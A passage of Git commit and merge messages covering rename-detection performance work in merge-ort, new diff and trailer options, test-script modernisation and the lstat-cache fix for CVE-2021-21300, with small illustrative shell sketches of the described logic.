with only whole second resolution).
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With --temp (or --stage=all, which implies --temp), checkout-index
writes a list to stdout associating temporary file names to the entries'
names. But if it fails to write an entry, and the failure happens before
even assigning a temporary filename to that entry, we get an odd output
line. This can be seen when trying to check out a symlink whose blob is
missing:
$ missing_blob=$(git hash-object --stdin </dev/null)
$ git update-index --add --cacheinfo 120000,$missing_blob,foo
$ git checkout-index --temp foo
error: unable to read sha1 file of foo (e69de29bb2)
foo
The 'TAB foo' line is not very useful and it might break scripts that
expect the 'tempname TAB foo' output. So let's omit such entries from
the stdout list (but leaving the error message on stderr).
We could also consider omitting _all_ failed entries from the output
list, but that's probably not a good idea as the associated tempfiles
may have been created even when checkout failed, so scripts may want to
use the output list for cleanup.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variables `path` and `ce->name`, at write_entry(), usually have the
same contents, but that's not the case when using a checkout prefix or
writing to a tempfile. (In fact, `path` will be either empty or dirty
when writing to a tempfile.) Therefore, these variables cannot be used
interchangeably. In this sense, fix wrong uses of `path` in error
messages where it should really be `ce->name`, and add some regression
tests. (Note: there doesn't seem to be any misuse in the other way
around.)
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the implementation of "git difftool", there is a case where the
user wants to start viewing the diffs at a specific path and
continue on to the rest, optionally wrapping around to the
beginning. Since it is somewhat cumbersome to implement such a
feature as a post-processing step of "git diff" output, let's
support it internally with two new options.
- "git diff --rotate-to=C", when the resulting patch would show
paths A B C D E without the option, would "rotate" the paths to
show patches for C D E A B instead. It is an error when no patch
for C is shown.
- "git diff --skip-to=C" would instead "skip" the paths before C,
and show patches for C D E. Again, it is an error when no patch
for C is shown.
- "git log [-p]" also accepts these two options, but it is not an
error if there is no change to the specified path. Instead, the
set of output paths is rotated or skipped to the specified path
or the first path that sorts after the specified path.
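The ordering for the "git diff" case can be modeled in a few lines of
shell. This is only a sketch of the path ordering, not of Git's
implementation: the function name reorder_paths and the error wording are
made up, and paths containing whitespace are not handled.

```shell
# Model of the path ordering only; paths with whitespace are not handled.
# Usage: reorder_paths rotate|skip PIVOT PATH...
reorder_paths () {
	mode=$1 pivot=$2
	shift 2
	before= after= found=
	for p
	do
		if test -z "$found" && test "$p" = "$pivot"
		then
			found=yes
		fi
		if test -n "$found"
		then
			after="$after $p"
		else
			before="$before $p"
		fi
	done
	if test -z "$found"
	then
		# Mirrors the "it is an error" rule for "git diff"; wording is made up.
		echo "error: no patch for $pivot is shown" >&2
		return 1
	fi
	case "$mode" in
	rotate) echo $after $before ;;
	skip) echo $after ;;
	esac
}
```

With the paths from the description, `reorder_paths rotate C A B C D E`
prints "C D E A B" and `reorder_paths skip C A B C D E` prints "C D E".
The more lenient "git log" behavior is not modeled here.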
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to pass additional information to diffcore_rename() (or some
variant thereof) without plumbing that extra information through
diff_tree_oid() and diffcore_std(). Further, since we will need to
gather additional special information related to diffs and are walking
the trees anyway in collect_merge_info(), it seems odd to have
diff_tree_oid()/diffcore_std() repeat those tree walks. And there may
be times where we can avoid traversing into a subtree in
collect_merge_info() (based on additional information at our disposal),
that the basic diff logic would be unable to take advantage of. For all
these reasons, just create the add and delete pairs ourselves and then
call diffcore_rename() directly.
This change is primarily about enabling future optimizations; the
advantage of avoiding extra tree traversals is small compared to the
cost of rename detection, and the advantage of avoiding the extra tree
traversals is somewhat offset by the extra time spent in
collect_merge_info() collecting the additional data anyway. However...
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
                Before                  After
no-renames:      13.294 s ± 0.103 s     12.775 s ± 0.062 s
mega-renames:   187.248 s ± 0.882 s    188.754 s ± 0.284 s
just-one-mega:    5.557 s ± 0.017 s      5.599 s ± 0.019 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The last few patches have introduced a new preliminary step when rename
detection is on but both break detection and copy detection are off.
Document this new step. While we're at it, add a testcase that checks
the new behavior as well.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make use of the new find_basename_matches() function added in the last
two patches, to find renames more rapidly in cases where we can match up
files based on basenames. As a quick reminder (see the last two commit
messages for more details), this means for example that
docs/extensions.txt and docs/config/extensions.txt are considered likely
renames if there are no remaining 'extensions.txt' files elsewhere among
the added and deleted files, and if a similarity check confirms they are
similar, then they are marked as a rename without looking for a better
similarity match among other files. This is a behavioral change, as
covered in more detail in the previous commit message.
We do not use this heuristic together with either break or copy
detection. The point of break detection is to say that filename
similarity does not imply file content similarity, and we only want to
know about file content similarity. The point of copy detection is to
use more resources to check for additional similarities, while this is
an optimization that uses far less resources but which might also result
in finding slightly fewer similarities. So the idea behind this
optimization goes against both of those features, and will be turned off
for both.
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
                Before                  After
no-renames:      13.815 s ± 0.062 s     13.294 s ± 0.103 s
mega-renames:  1799.937 s ± 0.493 s    187.248 s ± 0.882 s
just-one-mega:   51.289 s ± 0.019 s      5.557 s ± 0.017 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is not uncommon in real world repositories for the majority of file
renames to not change the basename of the file; i.e. most "renames" are
just a move of files into different directories. We can make use of
this to avoid comparing all rename source candidates with all rename
destination candidates, by first comparing sources to destinations with
the same basenames. If two files with the same basename are
sufficiently similar, we record the rename; if not, we include those
files in the more exhaustive matrix comparison.
This means we are adding a set of preliminary additional comparisons,
but for each file we only compare it with at most one other file. For
example, if there was a include/media/device.h that was deleted and a
src/module/media/device.h that was added, and there are no other
device.h files in the remaining sets of added and deleted files after
exact rename detection, then these two files would be compared in the
preliminary step.
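As a rough sketch of which pairs would reach the preliminary step, the
selection can be modeled with standard tools. The function names and the
"<file>.uniq" scratch files are hypothetical, paths with whitespace are
not handled, and the content similarity check that decides whether a pair
is actually recorded as a rename is not modeled at all.

```shell
# Print "<basename> <path>" for basenames that occur exactly once on stdin.
unique_basenames () {
	awk -F/ '{ count[$NF]++; path[$NF] = $0 }
		END { for (b in count) if (count[b] == 1) print b, path[b] }' |
	sort
}

# $1: file listing deleted paths, $2: file listing added paths.
# Writes scratch files "$1.uniq" and "$2.uniq" next to the inputs.
basename_candidates () {
	unique_basenames <"$1" >"$1.uniq" &&
	unique_basenames <"$2" >"$2.uniq" &&
	join "$1.uniq" "$2.uniq" | awk '{ print $2 " -> " $3 }'
}
```

Given a deleted list containing include/media/device.h plus two util.c
files, and an added list containing src/module/media/device.h plus one
util.c, only the device.h pair is printed, because util.c is not unique
among the deleted files.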
This commit does not yet actually employ this new optimization, it
merely adds a function which can be used for this purpose. The next
commit will do the necessary plumbing to make use of it.
Note that this optimization might give us different results than without
the optimization, because it's possible that despite files with the same
basename being sufficiently similar to be considered a rename, there's
an even better match between files without the same basename. I think
that is okay for four reasons: (1) it's easy to explain to the users
what happened if it does ever occur (or even for them to intuitively
figure out), (2) as the next patch will show it provides such a large
performance boost that it's worth the tradeoff, and (3) it's somewhat
unlikely that despite having unique matching basenames that other files
serve as better matches. Reason (4) takes a full paragraph to
explain...
If the previous three reasons aren't enough, consider what rename
detection already does. Break detection is not the default, meaning
that if files have the same _fullname_, then they are considered related
even if they are 0% similar. In fact, in such a case, we don't even
bother comparing the files to see if they are similar let alone
comparing them to all other files to see what they are most similar to.
Basically, we override content similarity based on sufficient filename
similarity. Without the filename similarity (currently implemented as
an exact match of filename), we swing the pendulum the opposite
direction and say that filename similarity is irrelevant and compare a
full N x M matrix of sources and destinations to find out which have the
most similar contents. This optimization just adds another form of
filename similarity comparison, but augments it with a file content
similarity check as well. Basically, if two files have the same
basename and are sufficiently similar to be considered a rename, mark
them as such without comparing the two to all other rename candidates.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to make use of unique basenames among remaining source and
destination files to help inform rename detection, so that more likely
pairings can be checked first. (src/moduleA/foo.txt and
source/module/A/foo.txt are likely related if there are no other
'foo.txt' files among the remaining deleted and added files.) Add a new
function, not yet used, which creates a map of the unique basenames
within rename_src and another within rename_dst, together with the
indices within rename_src/rename_dst where those basenames show up.
Non-unique basenames still show up in the map, but have an invalid index
(-1).
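The shape of such a map can be sketched as follows. This is an
illustration under assumptions, not the C function the commit adds: the
name basename_index_map is made up, the input is one path per line, and
the index is simply the 0-based line number.

```shell
# Print "<basename> <index>" for each basename seen on stdin, where index
# is the 0-based position of the path, or -1 if the basename is not unique.
basename_index_map () {
	awk '{
		n = split($0, parts, "/")
		base = parts[n]
		if (base in idx)
			idx[base] = -1
		else
			idx[base] = NR - 1
	}
	END { for (b in idx) print b, idx[b] }' | sort
}
```

For the three paths src/moduleA/foo.txt, lib/a.c and docs/a.c, the map
holds "foo.txt 0" and "a.c -1": the non-unique basename stays in the map
but carries the invalid index.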
This function was inspired by the fact that in real world repositories,
files are often moved across directories without changing names. Here
are some sample repositories and the percentage of their historical
renames (as of early 2020) that preserved basenames:
* linux: 76%
* gcc: 64%
* gecko: 79%
* webkit: 89%
These statistics alone don't prove that an optimization in this area
will help or how much it will help, since there are also unpaired adds
and deletes, restrictions on which basenames we consider, etc., but it
certainly motivated the idea to try something in this area.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a simple test where a removed file is similar to two different added
files; one of them has the same basename, and the other has a slightly
higher content similarity. In the current test, content similarity is
weighted higher than filename similarity.
Subsequent commits will add a new rule that weighs a mixture of filename
similarity and content similarity in a manner that will change the
outcome of this testcase.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have to look at each entry in rename_src a total of rename_dst_nr
times. When we're not detecting copies, any exact renames or ignorable
rename paths will just be skipped over. While checking that these can
be skipped over is a relatively cheap check, it's still a waste of time
to do that check more than once, let alone rename_dst_nr times. When
rename_src_nr is a few thousand times bigger than the number of relevant
sources (such as when cherry-picking a commit that only touched a
handful of files, but from a side of history that has different names
for some high level directories), this time can add up.
First make an initial pass over the rename_src array and move all the
relevant entries to the front, so that we can iterate over just those
relevant entries.
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
                Before                  After
no-renames:      14.119 s ± 0.101 s     13.815 s ± 0.062 s
mega-renames:  1802.044 s ± 0.828 s   1799.937 s ± 0.493 s
just-one-mega:   51.391 s ± 0.028 s     51.289 s ± 0.019 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now, ref-filter is using pretty.c logic for setting trailer options.
New to ref-filter:
:key=<K> - only show trailers with specified key.
:valueonly[=val] - only show the value part.
:separator=<SEP> - inserted between trailer lines.
:key_value_separator=<SEP> - inserted between key and value in trailer lines
Enhancement to existing options (they can now take a value, which is optional):
:only[=val]
:unfold[=val]
'val' can be: true, on, yes or false, off, no.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we would like to use this trailers logic in the ref-filter, it's
nice to capture an invalid trailer argument. This will allow us to print
a precise error message while using `format_set_trailers_options()` in
ref-filter.
For capturing the invalid argument, we changed the working of
`format_set_trailers_options()` a little bit.
The original logic did a "break" and fell through in mainly 2 cases -
1. unknown/invalid argument
2. end of the arg string
But now instead of "break", we capture the invalid argument and return
non-zero. And non-zero is handled by the caller.
(We prepared the caller to handle non-zero in the previous commit).
Capturing invalid arguments this way will also affect the working
of the current logic, as at the end of the arg string it will return non-zero.
So in order to make things correct, we introduced an additional conditional
statement, i.e. if we encounter ")", do 'break'.
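The control flow described above can be sketched in shell. This is a
model of the idea only, not the C code in pretty.c: the names
parse_trailer_opts and invalid_arg are hypothetical, the option names are
taken from the ref-filter list earlier in this log, and the optional
'val' of only/unfold/valueonly is not validated.

```shell
# Parse a comma-separated option list that ends at ")".
# On an unknown option, record it in $invalid_arg and return non-zero.
parse_trailer_opts () {
	invalid_arg=
	rest=${1%%\)*}		# the ")" ends the list: stop there
	while test -n "$rest"
	do
		opt=${rest%%,*}
		case "$rest" in
		*,*) rest=${rest#*,} ;;
		*) rest= ;;
		esac
		case "$opt" in
		key=*|separator=*|key_value_separator=*)
			;;
		only|only=*|unfold|unfold=*|valueonly|valueonly=*)
			;;
		*)
			# Capture the offending argument for the caller's message.
			invalid_arg=$opt
			return 1
			;;
		esac
	done
	return 0
}
```

A caller can then report "$invalid_arg" precisely, while a well-formed
list such as "key=Signed-off-by,valueonly)" still returns zero because
reaching the ")" is treated as the normal end rather than as an error.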
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactored trailers formatting logic inside pretty.c to a new function
`format_set_trailers_options()`. This new function returns non-zero
when it encounters something unusual. The caller handles the non-zero
by "goto trailers_out".
This change will allow us to reuse the same logic in other places.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a function to test trailer options. This will make tests look cleaner
and will make it easier to add new tests for trailers in the future.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When commands are started from a subdirectory, they may have to
compare the path to the subdirectory (called prefix and found out
from $(pwd)) with the tracked paths. On macOS, $(pwd) and
readdir() yield decomposed paths, while the tracked paths are
usually normalized to the precomposed form, causing mismatch. This
has been fixed by taking the same approach used to normalize the
command line arguments.
* tb/precompose-prefix-too:
MacOS: precompose_argv_prefix()
The command line completion (in contrib/) completed "git branch -d"
with branch names, but "git branch -D" offered tagnames in addition,
which has been corrected. "git branch -M" had the same problem.
* jk/complete-branch-force-delete:
doc/git-branch: fix awkward wording for "-c"
completion: handle other variants of "branch -m"
completion: treat "branch -D" the same way as "branch -d"
Fix in passing custom args from "git clone" to "upload-pack" on the
other side.
* jv/upload-pack-filter-spec-quotefix:
t5544: clarify 'hook works with partial clone' test
upload-pack.c: fix filter spec quoting bug
Introduce an on-disk file to record revindex for packdata, which
traditionally was always created on the fly and only in-core.
* tb/pack-revindex-on-disk:
t5325: check both on-disk and in-memory reverse index
pack-revindex: ensure that on-disk reverse indexes are given precedence
t: support GIT_TEST_WRITE_REV_INDEX
t: prepare for GIT_TEST_WRITE_REV_INDEX
Documentation/config/pack.txt: advertise 'pack.writeReverseIndex'
builtin/pack-objects.c: respect 'pack.writeReverseIndex'
builtin/index-pack.c: write reverse indexes
builtin/index-pack.c: allow stripping arbitrary extensions
pack-write.c: prepare to write 'pack-*.rev' files
packfile: prepare for the existence of '*.rev' files
Various test updates.
* ab/tests-various-fixup:
rm tests: actually test for SIGPIPE in SIGPIPE test
archive tests: use a cheaper "zipinfo -h" invocation to get header
upload-pack tests: avoid a non-zero "grep" exit status
git-svn tests: rewrite brittle tests to use "--[no-]merges".
git svn mergeinfo tests: refactor "test -z" to use test_must_be_empty
git svn mergeinfo tests: modernize redirection & quoting style
cache-tree tests: explicitly test HEAD and index differences
cache-tree tests: use a sub-shell with less indirection
cache-tree tests: remove unused $2 parameter
cache-tree tests: refactor for modern test style
diffcore_rename() had some code to avoid having destination paths that
already had an exact rename detected from being re-checked for other
renames. Source paths, however, were re-checked because we wanted to
allow the possibility of detecting copies. But if copy detection isn't
turned on, then this merely amounts to attempting to find a
better-than-exact match, which naturally ends up being an expensive
no-op. In particular, copy detection is never turned on by the merge
machinery.
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
                Before                  After
no-renames:      14.263 s ± 0.053 s     14.119 s ± 0.101 s
mega-renames:  5504.231 s ± 5.150 s   1802.044 s ± 0.828 s
just-one-mega:  158.534 s ± 0.498 s     51.391 s ± 0.028 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add assertions of the correct parameter count of various functions, in
particular the wrappers for the shell "test" built-in.
In an earlier commit we fixed a bug with an incorrect number of
arguments being passed to "test_path_is_{file,missing}". Let's also
guard other similar functions from the same sort of misuse.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the optional "diagnostics" parameter of the
test_path_is_{file,dir,missing} functions.
We have a lot of uses of these functions, but the only legitimate use
of the diagnostics parameter is from when the functions themselves
were introduced in 2caf20c52b (test-lib: user-friendly alternatives
to test [-d|-f|-e], 2010-08-10).
But as the rest of this diff demonstrates, its presence did more to
silently introduce bugs in our tests. Fix such bugs in the tests added
in ae4e89e549 (gc: add --keep-largest-pack option, 2018-04-15), and
c04ba51739 (t6046: testcases checking whether updates can be skipped
in a merge, 2018-04-19).
Let's also assert that those functions are called with exactly one
parameter. A follow-up commit will add similar asserts to other
functions in test-lib-functions.sh that we didn't have existing misuse
of.
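The kind of assertion meant here can be sketched as follows. The helper
below is a hypothetical stand-in, not the code in test-lib-functions.sh;
its name, messages and exit codes are assumptions for illustration.

```shell
# Hypothetical stand-in for a test-lib helper; not Git's actual code.
path_is_file () {
	if test "$#" -ne 1
	then
		# A stray extra argument is a bug in the caller, not a test failure.
		echo "bug in the test script: path_is_file takes 1 param, got $#" >&2
		return 2
	fi
	if ! test -f "$1"
	then
		echo "File $1 doesn't exist" >&2
		return 1
	fi
}
```

With the check in place, a call that passes two arguments fails loudly
instead of having the second argument silently interpreted as something
else.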
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename the "diff-lib" to "lib-diff". With this rename and preceding
commits there is no remaining t/*lib* which doesn't follow the
convention of being called t/lib-*.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* maint-2.22:
Git 2.22.5
Git 2.21.4
Git 2.20.5
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.21:
Git 2.21.4
Git 2.20.5
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.20:
Git 2.20.5
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.19:
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.18:
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.17:
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
In the previous commit, we intercepted calls to `rmdir()` to invalidate
the lstat cache in the successful case, so that the lstat cache could
not have the idea that a directory exists where there is none.
The same situation can arise, of course, when a separate process is
spawned (most notably, this is the case in `submodule_move_head()`).
Obviously, we cannot know whether a directory was removed in that
process, therefore we must invalidate the lstat cache afterwards.
Note: in contrast to `lstat_cache_aware_rmdir()`, we invalidate the
lstat cache even in case of an error: the process might have removed a
directory and still have failed afterwards.
Co-authored-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Before checking out a file, we have to confirm that all of its leading
components are real existing directories. And to reduce the number of
lstat() calls in this process, we cache the last leading path known to
contain only directories. However, when a path collision occurs (e.g.
when checking out case-sensitive files in case-insensitive file
systems), a cached path might have its file type changed on disk,
leaving the cache in an invalid state. Normally, this doesn't bring
any bad consequences as we usually check out files in index order, and
therefore, by the time the cached path becomes outdated, we no longer
need it anyway (because all files in that directory would have already
been written).
But, there are some users of the checkout machinery that do not always
follow the index order. In particular: checkout-index writes the paths
in the same order that they appear on the CLI (or stdin); and the
delayed checkout feature -- used when a long-running filter process
replies with "status=delayed" -- postpones the checkout of some entries,
thus modifying the checkout order.
When we have to check out an out-of-order entry and the lstat() cache is
invalid (due to a previous path collision), checkout_entry() may end up
using the invalid data and trusting that the leading components are
real directories when, in reality, they are not. In the best case
scenario, where the directory was replaced by a regular file, the user
will get an error: "fatal: unable to create file 'foo/bar': Not a
directory". But if the directory was replaced by a symlink, checkout
could actually end up following the symlink and writing the file at a
wrong place, even outside the repository. Since delayed checkout is
affected by this bug, it could be used by an attacker to write
arbitrary files during the clone of a maliciously crafted repository.
Some candidate solutions considered were to disable the lstat() cache
during unordered checkouts or sort the entries before passing them to
the checkout machinery. But both ideas include some performance penalty
and they don't future-proof the code against new unordered use cases.
Instead, we now manually reset the lstat cache whenever we successfully
remove a directory. Note: We are not even checking whether the directory
was the same as the lstat cache points to because we might face a
scenario where the paths refer to the same location but differ due to
case folding, precomposed UTF-8 issues, or the presence of `..`
components in the path. Two regression tests, with case-collisions and
utf8-collisions, are also added for both checkout-index and delayed
checkout.
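A toy model may help to see why resetting on a successful rmdir() closes
the hole. Everything below is hypothetical (the names is_real_dir,
cache_aware_rmdir and cached_dir are made up, and Git's real cache lives
in C and tracks more state); it only shows a remembered "this is a
directory" answer going stale and being dropped.

```shell
cached_dir=

# Succeeds if $1 is a real directory (not a symlink). Remembers the last
# positive answer so that a repeated query skips the filesystem check.
is_real_dir () {
	if test "$1" = "$cached_dir"
	then
		return 0
	fi
	if test -d "$1" && ! test -h "$1"
	then
		cached_dir=$1
		return 0
	fi
	return 1
}

# rmdir wrapper that forgets the cached answer whenever a removal succeeds,
# without checking whether the removed path is the cached one.
cache_aware_rmdir () {
	rmdir "$1" && cached_dir=
}
```

If a directory is removed with a plain rmdir and replaced by a symlink,
is_real_dir keeps answering from the stale cache; going through
cache_aware_rmdir forces a fresh check, which then notices the symlink.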
Note: to make the previously mentioned clone attack unfeasible, it would
be sufficient to reset the lstat cache only after the remove_subtree()
call inside checkout_entry(). This is the place where we would remove a
directory whose path collides with the path of another entry that we are
currently trying to check out (possibly a symlink). However, in the
interest of a thorough fix that does not leave Git open to
similar-but-not-identical attack vectors, we decided to intercept
all `rmdir()` calls in one fell swoop.
This addresses CVE-2021-21300.
Co-authored-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
The "ort" merge strategy.
* en/merge-ort-perf:
merge-ort: begin performance work; instrument with trace2_region_* calls
merge-ort: ignore the directory rename split conflict for now
merge-ort: fix massive leak
ORT merge strategy learns to infer "renamed directory" while
merging.
* en/ort-directory-rename:
merge-ort: fix a directory rename detection bug
merge-ort: process_renames() now needs more defensiveness
merge-ort: implement apply_directory_rename_modifications()
merge-ort: add a new toplevel_dir field
merge-ort: implement handle_path_level_conflicts()
merge-ort: implement check_for_directory_rename()
merge-ort: implement apply_dir_rename() and check_dir_renamed()
merge-ort: implement compute_collisions()
merge-ort: modify collect_renames() for directory rename handling
merge-ort: implement handle_directory_level_conflicts()
merge-ort: implement compute_rename_counts()
merge-ort: copy get_renamed_dir_portion() from merge-recursive.c
merge-ort: add outline of get_provisional_directory_renames()
merge-ort: add outline for computing directory renames
merge-ort: collect which directories are removed in dirs_removed
merge-ort: initialize and free new directory rename data structures
merge-ort: add new data structures for directory rename detection
Currently invalid boolean config values return messages about 'bad
numeric', which is slightly misleading when the error was due to a
boolean value. We can improve the developer experience by returning a
boolean error message when we know the value is neither a bool text nor
an int.
Before, with an invalid boolean value of `non-boolean`, it's unclear what
numeric is referring to:
fatal: bad numeric config value 'non-boolean' for 'commit.gpgsign': invalid unit
Now the error message mentions that `non-boolean` is a bad boolean value:
fatal: bad boolean config value 'non-boolean' for 'commit.gpgsign'
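The decision can be sketched in shell as below. This is a simplified
model rather than Git's parser: the function name parse_bool_config is
hypothetical, and only the boolean words (case-insensitively), the empty
string and unsigned decimal integers are handled, so negative numbers and
unit suffixes are deliberately left out.

```shell
# Simplified model: boolean words, the empty string, unsigned integers.
# $1: config key, $2: value
parse_bool_config () {
	key=$1
	value=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
	case "$value" in
	true|yes|on)
		echo true
		;;
	false|no|off|'')
		echo false
		;;
	*[!0-9]*)
		# Neither a bool text nor an int: say "boolean", not "numeric".
		echo "fatal: bad boolean config value '$2' for '$key'" >&2
		return 1
		;;
	*)
		if test "$value" -eq 0
		then
			echo false
		else
			echo true
		fi
		;;
	esac
}
```

Calling `parse_bool_config commit.gpgsign non-boolean` prints the new
message shown above on stderr and returns non-zero.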
Signed-off-by: Andrew Klotz <agc.klotz@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to Documentation/CodingGuidelines, we should use "test"
rather than "[ ... ]" in shell scripts, so let's replace the
"[ ... ]" with "test" in the t7001 test script.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change from old style to current style by taking advantage of
here-docs instead of echo commands.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modern practice is to avoid multiple commands per line, and
instead place each command on its own line.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use `>` rather than `touch` to create an empty file when the
timestamp isn't relevant to the test.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid using `cd` outside of subshells since, if the test fails,
there is no guarantee that the current working directory is the
expected one, which may cause subsequent tests to run in the wrong
directory.
While at it, make some other tests more concise by replacing
simple subshells with `git -C`.
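A small sketch of the subshell pattern, runnable outside the test suite.
The directory "/" and the deliberately failing `false` are placeholders
for a real test body.

```shell
start=$(pwd)

# The cd is confined to the subshell, so a failure in the middle of the
# chain cannot leave later commands running in the wrong directory.
subshell_status=0
(
	cd / &&
	false &&
	echo "not reached"
) || subshell_status=$?

after=$(pwd)
```

Here "$after" is still equal to "$start" even though the chain failed
after the `cd`, which is the guarantee a bare `cd` in the test body cannot
give.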
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to Documentation/CodingGuidelines, there should be no
whitespace after redirect operators. So, we should remove these
whitespaces after redirect operators.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests use an old style for formatting subshells:
    (command &&
        ...
Update them to the modern style:
    (
        command &&
        ...
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests use a deprecated style in which there are unnecessary
blank lines after the opening quote of the test body and before the
closing quote. So we should remove these unnecessary blank lines.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests in this script are formatted using a very old style:
    test_expect_success \
        'title' \
        'body line 1 &&
        body line 2'
Update the formatting to the modern style:
    test_expect_success 'title' '
        body line 1 &&
        body line 2
    '
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Save sizeof(const char *) bytes by declaring ref_stash as an array
instead of having a redundant pointer to an array.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modernize the script by doing file content comparisons using test_cmp()
instead of `test x = "$(cat file)"`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to modernize the test script, replace `test -s` with
test_file_not_empty(), which provides better diagnostic output in the
case of failure.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If a git command in a nested command substitution fails, it will be
silently ignored since only the return code of the outer command
substitutions is reported. Factor out nested command substitutions so
that the error codes of those commands are reported.
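The effect is easy to reproduce without Git. In the sketch below,
failing_cmd is a hypothetical stand-in for a git command that prints
something and then fails.

```shell
# Hypothetical stand-in for a git command that prints something and fails.
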